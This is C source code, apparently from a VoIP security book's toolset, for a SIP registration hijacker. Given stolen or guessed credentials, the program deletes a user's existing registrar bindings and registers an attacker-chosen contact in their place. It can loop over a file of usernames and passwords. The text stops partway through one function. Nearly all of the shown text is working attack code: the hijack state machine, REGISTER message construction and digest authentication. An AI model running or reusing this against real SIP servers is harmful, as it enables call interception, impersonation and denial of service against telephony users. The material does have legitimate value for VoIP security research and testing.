//-------------------------------------------------------------------------------
//
//      reghijacker.c - Registration Hijacker used to attempt
//                 to replace valid uri/user bindings in the SIP
//                 Registrar's location service with a bogus binding
//                 or binding for a rogue agent. 
//
//    The Copyright statement immediately following applies to
//    all code within this source file except for functions:
//        CvtHex
//        DigestCalcHA1,
//        DigestCalcResponse
//    Those functions were extracted from Internet Society
//    RFC 2617 and the Internet Society Copyright applies to
//    them. See the preambles of those functions for the
//    Internet Society's peculiar copyright.
//
//    Copyright (C) 2004  Mark D. Collier/Mark O'Brien
//
//    This program is free software; you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation; either version 2 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program; if not, write to the Free Software
//    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//
//   Author: Mark D. Collier/Mark O'Brien - 09/09/2004  v1.0
//         www.securelogix.com - mark.collier@securelogix.com
//         www.hackingexposedvoip.com
//
//-------------------------------------------------------------------------------

#include "reghijacker.h"

int main (int argc, char **argv)
{
    int	i                           = 0,
        opt                         = 0;
	
    struct  ifreq ifreq;
    struct  sockaddr_in *saptr      = NULL;
		
    char line[256];                             // username/pwd file line

    char *psTempIPv4Addr            = NULL;

    unsigned char *ipStr            = NULL;		// to enable access of host IP by bytes

    signal( SIGTERM, catch_signals );
    signal( SIGINT, catch_signals );

    //  The minimum # of arguments are five:
    //	interface
    //	domain to probe
    //      IPv4 addr of domain's SIP Proxy server
    //      hijack contact info
    //      file into which results are written
    //      users/passwords filename
    //  

    if ( argc < 7 )
    {
        usage();
    }

    //
    //  parse the command line
    //

    while ((opt = getopt(argc, argv, "f:u:p:s:v")) != EOF)
    {
        switch (opt)
        {
            case 'f':                           //  filename of users/passwds to hijack
                psUsersToHijackFilename = optarg;
                bUsersFilePresent = true;
                break;
            case 's':                           //  sleep btwn each message output
                psSleep = optarg;               //  sleep interval in usec.
                break;
            case 'u':                           //  alternative to file of usernames/pwds
                psUser = optarg;
                break;
            case 'p':                           //  alternative to file of usernames/pwds
                psPassword = optarg;
                break;
            case 'v':                           //  verbose option
                bVerbose = true;
                break;
            case 'h':                           //  usage
            case '?':
                usage();
                break;
        }
    }    
   
    //  getopt permutes the order of the parms in argv[] placing non-optional parms
    //  at the end of argv. optind should be the index of the 1st mandatory non-optional
    //  parm in argv[]  and there must be exactly 4 non-optional mandatory parms:
    //	interface (e.g. eth0)
    //	domain to hijack (e.g. enterprise1.com)
    //       IP address of the domain's registrar
    //       filename into which results are written
    
    if ( optind != ( argc - 5 ) )
    {
        usage();
    }
	
    psDevice                        = argv[optind++];
    psDomainToHijack                = argv[optind++];
    
    //  FIXME - Tool should use DNS to determine IP addr of domain's SIP Proxy,
    //  FIXME - as opposed to requiring an input of its IP addr
    
    psDomainSipRegistrarIPv4Addr    = argv[optind++];
    psHijackContactInfo             = argv[optind++];
    psResultsFilename               = argv[optind++];

    //  Convert the domain's IPv4 address from string to numeric.
    //    -- copy the input string since call to Str2IP is destructive.
    
    psTempIPv4Addr = strdup( psDomainSipRegistrarIPv4Addr );
    
    //  Str2IP returns the numeric IP address in network byte order.
    
    if ( Str2IP( psTempIPv4Addr, &domainSipRegistrarIPv4Addr )
         != EXIT_SUCCESS )
    {
        printf( "\nSIP Proxy addr not a valid IPv4 address: %s\n",
                 psDomainSipRegistrarIPv4Addr );
        free ( psTempIPv4Addr );
        usage();
    }
    
    free( psTempIPv4Addr );
    
    //  parse psSleep to confirm it is a valid long.
    
    if ( psSleep )
    {
        for ( i = 0; i < strlen( psSleep ); i++ )
        {
            if ( !isdigit ( psSleep[i] ) )
            {
                printf( "\nsleep time invalid: %s\n", psSleep );
                usage();
            }
        }
        sleepTimeUsec = atol( psSleep );
    }
    
    //
    //  Either a filename of users/passwords must be present, or the
    //  -u user -p password option pair must be present, but not both.
    //
    
    if ( psUsersToHijackFilename )
    {
        if ( psUser || psPassword )
        {
            printf( "\n-f filename, or -u user -p password, not both\n" );
            usage();
        }
        
        hUsersToHijackFile = fopen( psUsersToHijackFilename, "r" );
    
        if ( !hUsersToHijackFile )
        {
            perror( "\nRegistration Hijacker - User/PW file open error" );
            usage();
        }
    }
    else if ( !( psUser && psPassword ) )
    {
        printf( "\nWhen no -f filename, -u user -p password are mandatory\n" );
        usage();
    }
        
    hResultFile = fopen( psResultsFilename, "w+");
    
    if ( !hResultFile )
    {
        perror( "\nRegistration Hijacker - Result File open error" );        
        fclose( hUsersToHijackFile );
        usage();
    }    
    
    //
    //  print summary of scenario
    //
    
    printf( "\n%s\n", __REGHIJACKER_VERSION );
    fprintf( hResultFile, "\n%s\n", __REGHIJACKER_VERSION );
    
    printf( "%s\n", __REGHIJACKER_DATE );
    fprintf( hResultFile, "%s\n", __REGHIJACKER_DATE );
    
    printf( "\nDomain to Hijack Registrations: %s", psDomainToHijack );
    fprintf( hResultFile, "\nDomain to Hijack Registrations: %s", psDomainToHijack );
    
    printf( "\nDomain's SIP Registrar IP addr: %s", psDomainSipRegistrarIPv4Addr );
    fprintf( hResultFile, "\nDomain's SIP Registrar IP addr: %s", psDomainSipRegistrarIPv4Addr );

    printf( "\nHijack Contact Info: %s", psHijackContactInfo );
    fprintf( hResultFile, "\nHijack Contact Info: %s", psHijackContactInfo );
    
    if ( bUsersFilePresent )
    {
        printf( "\nFile of Users/Passwords:        %s", psUsersToHijackFilename );
        fprintf( hResultFile, "\nFile of Users/Passwords:        %s", psUsersToHijackFilename );
    }
    else
    {
        printf( "\nUser to Hijack:                 %s", psUser );
        fprintf( hResultFile, "\nUser to Hijack:                 %s", psUser );
        printf( "\nUser Password:                  %s", psPassword );
        fprintf( hResultFile, "\nUser Password:                  %s", psPassword );
    }
    
    printf( "\nResults written to:             %s", psResultsFilename );
    
    if ( psSleep )
    {
        printf( "\nSleep btwn Hijack attempts (usec): %d", sleepTimeUsec );
        fprintf( hResultFile, "\nSleep btwn Hijack attempts (usec): %d", sleepTimeUsec );
    }
    
    printf( "\n" );
    fprintf( hResultFile, "\n" );
        
    strcpy( ifreq.ifr_ifrn.ifrn_name, psDevice );
    
    if ( ( sockfd = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP ) ) < 0 )
    {
        fprintf( stderr,
                 "\nsocket - Couldn't allocate socket to obtain host IP addr\n" );
        CleanupAndExit( EXIT_FAILURE );
    }
    
    if ( ioctl( sockfd, SIOCGIFADDR, &ifreq ) != 0 )
    {
        fprintf( stderr,
                 "\nioctl - Couldn't read socket's IP address\n" );        
        CleanupAndExit( EXIT_FAILURE );
    }
	
    saptr = (struct sockaddr_in *) &ifreq.ifr_addr;
    hostIPv4Addr = (unsigned int) saptr->sin_addr.s_addr;   // host IPv4 addr in network order

    //  Create a dotted string version of the host's IP address to use for the SIP message	
	
    ipStr = (unsigned char *) &hostIPv4Addr;
	
    snprintf( hostIPv4AddrDotted,
              15,
              "%hu.%hu.%hu.%hu",
              ipStr[0], ipStr[1], ipStr[2], ipStr[3] );

    if ( bVerbose )
    {
        printf( "\nMy IP address for device %s is: %s\n",
                psDevice,
                hostIPv4AddrDotted );		
    }

    fprintf( hResultFile, "\nMy IP address for device %s is: %s\n",
                psDevice, hostIPv4AddrDotted );
    
    socketReceiveBufferSize = 32768;
    if ( setsockopt( sockfd,
                     SOL_SOCKET,
                     SO_RCVBUF,
                     &socketReceiveBufferSize,
                     sizeof( socketReceiveBufferSize ) ) == -1 )
    {
        perror( "\nsetsockopt");
        CleanupAndExit( EXIT_FAILURE );
    }

    localAddress.sin_family      = AF_INET;
    localAddress.sin_addr.s_addr = saptr->sin_addr.s_addr;
    localAddress.sin_port        = htons( __REGHIJACKER_SOURCE_PORT );
    memset( &localAddress.sin_zero, '\0', 8 );

    if ( bind( sockfd,
               ( struct sockaddr * )&localAddress,
               sizeof( localAddress ) ) == -1 )
    {
        fprintf( stderr,
                 "Error binding to %s:%d\n",
                  hostIPv4AddrDotted,
                  __REGHIJACKER_SOURCE_PORT );
        CleanupAndExit( EXIT_FAILURE );
    }

    remoteAddress.sin_family      = AF_INET;
    remoteAddress.sin_addr.s_addr = domainSipRegistrarIPv4Addr;
    remoteAddress.sin_port        = htons( 5060 );
    memset( &remoteAddress.sin_zero, '\0', 8 );

    responsePayload = (char *)malloc( socketReceiveBufferSize + 1 );
    if ( !responsePayload )
    {
        perror("\n malloc failure for responsePayload" );
        CleanupAndExit( EXIT_FAILURE );
    }
    
    //  This is where it all happens!

    if ( psUsersToHijackFilename )
    {
        //  Execute the Reg Hijacker Finite State Machine
        //  for each User/PW pair in file
        
        while ( fgets( line, 256, hUsersToHijackFile) != NULL )
        {
            if ( extractUsernameAndPassword( line, &psUser, &psPassword ) )
            {
                if ( bVerbose )
                {
                    printf( "\nAttempt to Hijack User: %s, Password: %s\n",
                            psUser,
                            psPassword );
                }
                
                fprintf( hResultFile, "\nAttempt to Hijack User: %s, Password: %s\n",
                            psUser,
                            psPassword );
                
                regHijackerFSM();
                
            }  // end if ( extractUsernameAndPassword( ... ) )
            
            if ( sleepTimeUsec )
            {
                if ( bVerbose )
                {
                    printf( "sleeping %d usec btwn hijacks\n", sleepTimeUsec );
                }                
                usleep( sleepTimeUsec );
            }

        } // end while ( get user/password file line != NULL )
    }
    else
    {
        //  Execute the Reg Hijacker Finite State Machine for the
        //  specific User/PW pair on the command line
        
        if ( bVerbose )
        {
            printf( "\nAttempt to Hijack User: %s, Password: %s\n",
                    psUser,
                    psPassword );
        }
        
        fprintf( hResultFile, "\nAttempt to Hijack User: %s, Password: %s\n",
                    psUser,
                    psPassword );

        regHijackerFSM();
    }
    
    CleanupAndExit( EXIT_SUCCESS );
} // end main


//-----------------------------------------------------------------------------
//
//   regHijackerFSM()
//
//   Called to execute the SIP REGISTER hijacking Finite State Machine
//   for the party specified by global parameters psUser and psPassword.
//   Additional globals specify the IPv4 address of the Registrar to attack,
//   the domain served by the Registrar, the File handle into which results
//   are written, the IPv4 address of the interface on the host from which
//   the hijack is being launched, and the socket used to launch the attack.
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------
void  regHijackerFSM()
{
    //  The first step is to clear all other bindings at the Registrar
    //  for the user. The next step is to register the user to be contacted at
    //  a rouge UA. The anticipated message flow is as follows (presumes
    //  the Registrar will Challenge the REGISTER messages):
    //
    //    REGHIJACKER                                                                  REGISTRAR
    //
    //               1)  attempt to remove all bindings for target user
    //                    REGISTER  Contact: *   Expires:0
    //                ----------------------------------------------------------------------->
    //
    //               2)   401 UnAuthorized 
    //                          WWW-Authenticate: realm, nonce
    //                <-----------------------------------------------------------------------
    //
    //               3)  compute digest and attempt to remove bindings again
    //                    REGISTER  Contact: *   Expires:0   include Auth header
    //                ----------------------------------------------------------------------->
    //
    //               4)  200 OK
    //                <-----------------------------------------------------------------------
    //
    //               5)  attempt to hijack targeted user
    //                    REGISTER  Contact: <sip:user@hijack IP addr:port> Expires: 86400
    //                ----------------------------------------------------------------------->
    //
    //               6)    401 UnAuthorized
    //                          WWW-Authenticate: realm, nonce
    //                <-----------------------------------------------------------------------
    //
    //               7)  compute digest and attempt to hijack user again
    //                    REGISTER  Contact: <sip:user@hijack IP addr:port> Expires: 86400
    //                                            w/Auth header
    //                ----------------------------------------------------------------------->
    //
    //               8)    200 OK 
    //                <-----------------------------------------------------------------------
    //
        
    //  Initiatialize registration hijack state machine
    
    hijackerState = HIJACK_REMOVE_USER_BINDINGS;
    
    while ( hijackerState != HIJACK_TERMINUS )
    {
        // Execute state machine
        
        switch ( hijackerState )
        {
            case HIJACK_REMOVE_USER_BINDINGS :
            {
                //  Build & transmit a REGISTER message to remove user bindings
                
                hijackRemoveUserBindings();
                
                //  Only a single transition out of this state
                
                hijackerState = HIJACK_WAIT_REMOVE_BINDING_OK;
                
                break;
            } // end case HIJACK_REMOVE_USER_BINDINGS
            
            case HIJACK_REMOVE_USER_BINDINGS_AUTH :
            {
                //  Parse the 401 Unauthorized message response for the last
                //  REGISTER that requested to unbind all contacts for
                //  the user targeted for hijacking. Build and transmit another
                //  REGISTER message after computing the MD5 digest for
                //  that user and incorporating the Authorization header into
                //  the message.
                
                //  The state transition is dependent upon whether the expected
                //  MD5 digest parms are found in the 401 response.

                hijackRemoveUserBindingsAuth();
                
                break;
            } // end case HIJACK_REMOVE_USER_BINDINGS_AUTH
            
            case HIJACK_WAIT_REMOVE_BINDING_OK :
            {
                //  Wait for a response to the REGISTER request to remove
                //  all bindings for the user being targeted for hijacking.
                
                //  The state transition is dependent upon whether a response
                //  is received and what type of response it is. 
                
                hijackWaitRemoveBindingOk();
                
                break;
            } // case HIJACK_WAIT_REMOVE_BINDING_OK
            
            case HIJACK_REGISTER_NEW_CONTACT :
            {
                //  Build & transmit REGISTER message to add hijack binding
                
                hijackRegisterNewContact();

                //  Only a single transition out of this state
                
                hijackerState = HIJACK_WAIT_NEW_REGISTRATION_OK;
                
                break;
            } // end case HIJACK_REGISTER_NEW_CONTACT
            
            case HIJACK_REGISTER_NEW_CONTACT_AUTH :
            {
                //  Parse the 401 Unauthorized message response for the last
                //  REGISTER that requested to bind the hijacker contact
                //  for the user targeted for hijacking. Build and transmit another
                //  REGISTER message after computing the MD5 digest for
                //  that user and incorporating the Authorization header into
                //  the message.

                //  The transition is dependent upon whether the expected
                //  MD5 digest parms are found in the 401 response.
                
                hijackRegisterNewContactAuth();
                
                break;
            } // end case HIJACK_REGISTER_NEW_CONTACT_AUTH
            
            case HIJACK_WAIT_NEW_REGISTRATION_OK :
            {
                //  Wait for a response to the REGISTER request to bind
                //  the targeted user to the hijacker specified contact.
                
                //  The state transition is dependent upon whether a response
                //  is received and what type of response it is. 

                hijackWaitNewRegistrationOk();
                
                break;
            } // end case HIJACK_WAIT_NEW_REGISTRATION_OK
            
            default :
            {
                printf( "\nhijacker state out of bounds: %d\n",
                        hijackerState );
                CleanupAndExit( EXIT_FAILURE );
                
                break;
            }
        }  // switch on registration hijacker state
    }  // while ( hijackerState != HIJACK_TERMINUS )

} // end regHijackerFSM


//-----------------------------------------------------------------------------
//
//   extractUsernameAndPassword
//
//   Called to parse a string, line, containing a username
//   and password. Returns a bool reporting true (success)
//   or false (failure). The input is the string: line.
//   The pointers psUser and psPassword are set to the
//   first char of the corresponding username and 
//   password, respectively. The line is modified to add two '\0'
//   characters. The first nul char terminates the 
//   username and the second nul char terminates the
//   password. 
//
//      Note: Destructive call to line - see above.
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

bool  extractUsernameAndPassword ( char *psLine, char **psUser, char **psPassword )
{
    int start;
    int end;
    int lineLen;
    
    bool bFound   = false;
    
    lineLen = strlen(psLine);   // store initial len of line because line gets modified
    
    //  Scan line for the first non-whitespace character. Presume this is 
    //  the start of the username.
    
    for ( start = 0; start < lineLen; start++ )
    { 
        if ( !isspace( psLine[start] ) )	// check for space, formfeed, newline, ..etc
        {
            bFound = true;
            break;   // found the start of the username
        }
    }
 
    if ( !bFound )
    {
        return false;
    }
    
    *psUser = psLine + start;

    for ( end = start + 1; end < lineLen; end++ )
    {
        if ( isspace( psLine[end] ) )	// check for space, formfeed, newline, ..etc
        {
            psLine[end] = '\0';
            break;   // found the end of the username
        }
    }
    
    //  Scan line for the next non-whitespace character. Presume this is 
    //  the start of the password.
    
    bFound = false;
   
    for ( start = end + 1; start < lineLen; start++ )
    {
        if ( !isspace( psLine[start] ) )	// check for space, formfeed, newline, ..etc
        {
            bFound = true;
            break;   // found the start of the password
        }
    }
 
    if ( !bFound )
    {
        return false;
    }

    *psPassword = psLine + start;
    
    for ( end = start + 1; end < lineLen; end++ )
    {
        if ( isspace( psLine[end] ) )	// check for space, formfeed, newline, ..etc
        {
            psLine[end] = '\0';
            break;   // found the end of the username
        }
    }

    return true;
}  //  end extractUsernameAndPassword( ... )


//-----------------------------------------------------------------------------
//
//   hijackRemoveUserBindings()
//
//  In this state of the Registration Hijacker FSM, a REGISTER 
//  message is built and transmitted to remove (unbind) all existing
//  contacts within the Registrar for the user whose hijacking is
//  being attempted.
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

void  hijackRemoveUserBindings()
{
    sipPayload[0] = '\0';	// start with a fresh SIP Payload as a NUL String

    //  Generate Request Method
    strcat( sipPayload, METHOD_HEAD );
    strcat( sipPayload, psDomainSipRegistrarIPv4Addr );
    strcat( sipPayload, METHOD_TAIL );
    
    //  Save the URI of the Registrar for possible later use in Authentication
    registrarUri[0] = '\0';
    strcat( registrarUri, "sip:" );
    strncat( registrarUri, psDomainSipRegistrarIPv4Addr, 16 );

    //  Generate Via
    strcat( sipPayload, VIA_HEAD );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ":" );
    snprintf( sipPayload + strlen( sipPayload ) , 6, "%d",
              __REGHIJACKER_SOURCE_PORT );
    strcat( sipPayload, VIA_BRANCH );

    if ( ( psBranch = GetNextGuid() ) == NULL )
    {
        printf("\nBranch ID failure\n" );
        CleanupAndExit( EXIT_FAILURE );
    }

    strcat( sipPayload, psBranch );
    strcat( sipPayload, VIA_TAIL );

    //  Generate From header
    strcat( sipPayload, FROM_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ">;tag=" );

    if ( ( psFromTag = GetNextGuid() ) == NULL )
    {
        printf("\nFrom Tag ID failure\n" );
        CleanupAndExit( EXIT_FAILURE );
    }

    strcat( sipPayload, psFromTag );
    strcat( sipPayload, FROM_TAIL );

    //  Generate To header
    strcat( sipPayload, TO_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, TO_TAIL );                        
    
    //  Generate Call-ID
    if ( ( psCallID = GetNextGuid() ) == NULL )
    {
        printf("\nCall ID failure\n" );
        CleanupAndExit( EXIT_FAILURE );
    }
    
    strcat( sipPayload, CALL_ID_HEAD );                        
    strcat( sipPayload, psCallID );
    strcat( sipPayload, CALL_ID_TAIL );
    
    //  Generate CSeq                        
    cseq = 1;
    strcat( sipPayload, CSEQ_HEAD );
    snprintf( sipPayload + strlen( sipPayload ), 10, "%d", cseq );
    strcat( sipPayload, CSEQ_TAIL );
    
    //  Generate Max-Forwards                        
    strcat( sipPayload, MAX_FORWARDS_HEAD );
    
    //  Generate Contact header wildcard to expire all existing bindings                        
    strcat( sipPayload, CONTACT_REMOVE );
    
    //  Generate Expire header to force the expiration of all bindings
    strcat( sipPayload, EXPIRES_REMOVE );

    // Generate Content Length
    strcat( sipPayload, CONTENT_LEN_HEAD );

    // All SIP Headers must end with CRLF
    strcat( sipPayload, END_OF_HEADERS );

    transmitMsgAndResetTimer();
    
    bAlreadyChallenged = false;
    
}  // end hijackRemoveUserBindings()


//-----------------------------------------------------------------------------
//
//   hijackRemoveUserBindingsAuth()
//
//  In this state of the Registration Hijacker FSM, a 401 Unauthorized
//  response was received for a prior attempt to remove (unbind) all 
//  contacts within the Registrar for the user whose hijacking is being
//  attempted. This state parses the 401 message (i.e. an Authentication
//  Challenge) to retrieve the parms required to compute the MD5 
//  authentication digest for the user being hijacked. If the parms are
//  found, then the digest is computed and an Authorization header
//  is added to the REGISTER message that is requesting to remove
//  bindings for the user being hijacked. That REGISTER message
//  is transmitted to the Registrar.
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

void  hijackRemoveUserBindingsAuth()
{    
    //  Parse the 401 Unauthorized (i.e. Auth Challenge) message in
    //  responsePayload to cull the realm and nonce parms required
    //  by the MD5 digest calculation. If successful, globals psRealm
    //  and psNonce are set to point to substrings created within the
    //  responsePayload string (i.e. destructive to responsePayload)
    
    if ( !parseChallenge() )
    {
        free( psBranch );
        psBranch = NULL;
        free( psCallID );
        psCallID = NULL;
        free( psFromTag );
        psFromTag = NULL;
        
        hijackerState = HIJACK_TERMINUS;
        return;
    }
    
    // Now have the minumum inputs required to calculate the
    // MD5 digest response for a revised REGISTER message

    DigestCalcHA1( "md5",
                   psUser,
                   psRealm,
                   psPassword,
                   psNonce,
                   psCNonce,
                   HA1 );
    
    DigestCalcResponse( HA1,
                        psNonce,
                        szNonceCount,
                        psCNonce,
                        psQop,
                        "REGISTER",     // method
                        registrarUri,
                        HA2,
                        digestResponse );
                        
    if ( bVerbose )
    {
        printf( "\nResponse Digest = %s\n", digestResponse );
    }
    
    fprintf( hResultFile, "\nResponse Digest = %s\n", digestResponse );
    
    // Build Revised Register message with a new header line of the following format:
    //      Authorization: Digest username="username",
    //                                   realm="realm from Challenge",
    //                                   nonce="nonce from Challenge",
    //                                   uri="registrar's uri",
    //                                   response="responseDigest",
    //                                   algorithm=md5
    
    sipPayload[0] = '\0';	// start with fresh SIP Payload as a NUL String

    //  Generate Request Method
    strcat( sipPayload, METHOD_HEAD );
    strcat( sipPayload, psDomainSipRegistrarIPv4Addr );
    strcat( sipPayload, METHOD_TAIL );

    //  Generate Via
    strcat( sipPayload, VIA_HEAD );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ":" );
    snprintf( sipPayload + strlen( sipPayload ) , 6, "%d",
              __REGHIJACKER_SOURCE_PORT );
    strcat( sipPayload, VIA_BRANCH );
    
    if ( ( psBranch = GetNextGuid() ) == NULL )
    {
        printf("\nBranch ID failure\n" );
        CleanupAndExit( EXIT_FAILURE );
    }

    strcat( sipPayload, psBranch );     // new Branch value
    strcat( sipPayload, VIA_TAIL );

    //  Generate From header
    strcat( sipPayload, FROM_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ">;tag=" );
    strcat( sipPayload, psFromTag );    // same From tag as 1st Register
    strcat( sipPayload, FROM_TAIL );

    //  Generate To header
    strcat( sipPayload, TO_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, " <sip:" );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "@" );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, TO_TAIL );                        
    
    //  Generate Call-ID
    strcat( sipPayload, CALL_ID_HEAD );                        
    strcat( sipPayload, psCallID );     // same Call-ID as 1st Register
    strcat( sipPayload, CALL_ID_TAIL );
    
    //  Generate CSeq
    cseq++;                             // increment CSeq
    strcat( sipPayload, CSEQ_HEAD );
    snprintf( sipPayload + strlen( sipPayload ), 10, "%d", cseq );
    strcat( sipPayload, CSEQ_TAIL );
    
    //  Generate Max-Forwards                        
    strcat( sipPayload, MAX_FORWARDS_HEAD );
    
    //  Generate Contact header wildcard to expire all existing bindings                        
    strcat( sipPayload, CONTACT_REMOVE );

    //  Generate Authorization header
    strcat( sipPayload, AUTHORIZATION_HEAD );
    strcat( sipPayload, psUser );
    strcat( sipPayload, "\",realm=\"" );
    strcat( sipPayload, psRealm );
    strcat( sipPayload, "\",nonce=\"" );
    strcat( sipPayload, psNonce );
    strcat( sipPayload, "\",uri=\"" );
    strcat( sipPayload, registrarUri );
    strcat( sipPayload, "\",response=\"" );
    strcat( sipPayload, digestResponse );
    strcat( sipPayload, "\",algorithm=md5\r\n" );

    //  Generate Expire header to force the expiration of all bindings
    strcat( sipPayload, EXPIRES_REMOVE );

    // Generate Content Length
    strcat( sipPayload, CONTENT_LEN_HEAD );

    // All SIP Headers must end with CRLF
    strcat( sipPayload, END_OF_HEADERS );
    
    transmitMsgAndResetTimer();

    bAlreadyChallenged = true;

    hijackerState = HIJACK_WAIT_REMOVE_BINDING_OK;

}  //  end hijackRemoveUserBindingsAuth()


//-----------------------------------------------------------------------------
//
//   hijackWaitRemoveBindingOk()
//
//  In this state of the Registration Hijacker FSM, a wait is 
//  performed for the 200 status response to the REGISTER
//  message sent to the Registrar to remove all bindings for
//  the user whose hijacking is being attempted. Only a 
//  200 status response or a 401 Unauthorized response are
//  expected. Other messages received on the socket are
//  discarded. 
//
//  The wait is performed by the "select" statement using the
//  time out structure initialized in the transition to this state.
//  On Linux systems, the select statement decrements the
//  time out structure value each time a packet is avaiable to
//  be read from the socket. The select is reactivated if an
//  unexpected message is received. Eventually, either an
//  appropriate message is received or the response is timed
//  out.
//
//  NOTE: Operating Systems other than Linux might not
//                decrement the time out structure value each time
//                a packet is ready to be read. If the select is
//                reactivated, a full time out interval may be 
//                initiated. If many spurious messages are being
//                received on the socket, this state may never time
//                out!
//
//  If the select times out, the hijacking of the current user
//  ends.
//
//  If a 200 or 401 message is received, the Via branch parameter
//  must match the value sent in the REGISTER request message.
//  A matching 200 status response results in the state machine
//  being transitioned to the state where the binding of the user
//  to a hijack contact will be attempted. A matching 401 status
//  results in the state machine transitioning to one of:
//
//  a) the state where a new REGISTER message will be sent 
//      with the MD5 digest computed from the user's id, password,
//      the method (i.e. REGISTER), and parms received in the
//      401 Unauthorized message (nonce, realm).
//
//  b) termination of the user's hijacking if this is not the 1st
//       401 message received for the user (presumably either the 
//       username doesn't exist in the Registrar or his password
//       was not accurate.
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

void  hijackWaitRemoveBindingOk()
{
    // select socket                                        
    FD_ZERO( &socketFdSet );
    FD_SET( sockfd, &socketFdSet );

    selectStatus = select( sockfd + 1,
                           &socketFdSet,
                           NULL,
                           NULL,
                           &timeOut );

    switch ( selectStatus )
    {
        case -1:        //  error
        {
            perror( "\nWait For Bind Removal Reg OK - select");
            CleanupAndExit( EXIT_FAILURE );
            break;
        }
        
        case  0:        //  time out
        {
            printf( "\nREGISTER to expire bindings for user %s timed out\n",
                    psUser );
        
            fprintf( hResultFile,
                     "\nTimed Out Waiting for REGISTER response - skipping on\n\n" );

            //  skip past this user
            
            free( psBranch );
            psBranch = NULL;
        
            hijackerState = HIJACK_TERMINUS;
            break;
        }
        
        case  1:        //  a message is ready on input port
        {
            socketAddressLength = sizeof( remoteAddress );
        
            responsePayloadLen = recvfrom( sockfd,
                                    responsePayload,
                                    socketReceiveBufferSize,
                                    0,
                                    ( struct sockaddr * )&remoteAddress,
                                    &socketAddressLength );
                                      
            if ( responsePayloadLen == -1 )
            {
                perror( "\nrecvfrom payload error" );
                CleanupAndExit( EXIT_FAILURE );    
            }

            // FIXME - Some quick and dirty parsing. It should be improved.
            
            responsePayload[ responsePayloadLen ] = '\0';
            
            if ( strstr( responsePayload, "SIP/2.0 200" ) )
            {
                //  have a SIP response OK - is it for the outstanding REGISTER?
                //  scan to find the expected echo for the branch tag
                
                if ( strstr( responsePayload, psBranch ) )
                {
                    if ( bVerbose )
                    {
                        printf( "\n%s\n", responsePayload );
                    }
                    
                    fprintf( hResultFile, "\n%s\n",
                             responsePayload );
                    
                    //  A match! Advance the state machine.
                    
                    free( psBranch );
                    psBranch = NULL;
                    
                    hijackerState = HIJACK_REGISTER_NEW_CONTACT;
                }
                else
                {
                    ;  // ignore this message - continue waiting
                }
            }
            else if ( strstr( responsePayload, "SIP/2.0 401" ) )
            {
                //  401 UnAuthorized - a challenge - but is it for outstanding REGISTER?
                
                if ( strstr( responsePayload, psBranch ) )
                {
                    if ( bVerbose )
                    {
                        printf( "\n%s\n", responsePayload );
                    }
                    
                    fprintf( hResultFile, "\n%s\n",
                             responsePayload );
                    
                    //  try to authenticate to the Registrar only if this is the first
                    //  challenge received while attempting to unbind contacts
                    //  for this user.
                    
                    if ( bAlreadyChallenged )
                    {
                        // note the failure and skip this user
                        
                        if ( bVerbose )
                        {
                            printf( "\nFailed Auth Challenge for user %s - skipping on\n\n",
                                    psUser );
                        }
                        
                        fprintf( hResultFile, 
                                 "\nFailed Auth Challenge for user %s - skipping on\n\n",
                                 psUser );
                        
                        //  skip past this user
                        
                        free( psBranch );
                        psBranch = NULL;
                        free( psCallID );
                        psCallID = NULL;
                        free( psFromTag );
                        psFromTag = NULL;
                       
                        hijackerState = HIJACK_TERMINUS;
                    }
                    else
                    {
                        //  try to authenticate as this user.
                        
                        free( psBranch );
                        psBranch = NULL;
                        
                        hijackerState = HIJACK_REMOVE_USER_BINDINGS_AUTH;
                    }
                }
                else
                {
                    ;  // ignore this message - no transition
                }
            }
            break;
            
        }  //  case 1 - a message was ready to be read from the socket

        default:        // unexpected number of sockets have ready input
        {
            fprintf( stderr,
                     "\nselect in hijacker state %d: Too many ready %d:\n",
                     HIJACK_WAIT_REMOVE_BINDING_OK,
                     selectStatus );
            CleanupAndExit( EXIT_FAILURE );
            break;
        }
        
    }  // end switch (selectStatus)
    
}  // end hijackWaitRemoveBindingOk()


//-----------------------------------------------------------------------------
//
//   hijackRegisterNewContact()
//
//  In this state of the Registration Hijacker FSM, a REGISTER 
//  message is built and transmitted to bind the targeted user
//  to a hijacker contact. 
//
//  Tested: 09/17/2004 - Mark O'Brien
//
//-----------------------------------------------------------------------------

void  hijackRegisterNewContact()
{
    sipPayload[0] = '\0';	// start with fresh with SIP Payload as a String

    //  Generate Request Method
    strcat( sipPayload, METHOD_HEAD );
    strcat( sipPayload, psDomainSipRegistrarIPv4Addr );
    strcat( sipPayload, METHOD_TAIL );

    //  Generate Via
    strcat( sipPayload, VIA_HEAD );
    strcat( sipPayload, hostIPv4AddrDotted );
    strcat( sipPayload, ":" );
    snprintf( sipPayload + strlen( sipPayload ) , 6, "%d",
